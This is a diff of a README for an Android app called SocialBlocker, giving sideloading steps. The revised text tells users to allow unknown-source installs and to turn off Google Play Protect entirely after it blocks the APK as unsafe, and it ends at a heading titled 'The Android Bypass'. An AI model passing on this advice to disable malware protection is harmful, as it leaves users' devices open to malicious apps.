manaskallam1903-lgtm/SocialBlocker/README.md

 ## Instructions on How to Install the App

 **Install the APK:**
-* When they click the file, their phone will say "For your security, your phone is not allowed to install unknown apps from this source."
-Tell them to click Settings on that pop-up and toggle Allow from this source.
+* When you click the file, your phone will say "For your security, your phone is not allowed to install unknown apps from this source."
+Click Settings on that pop-up and toggle Allow from this source.

 * Bypass Play Protect: Google Play Protect might say "Unsafe app blocked".
-Tell them to click More details -> Install anyway.
+Go to play store -> profile -> play protect -> Turn it off.

 **The Android Bypass:**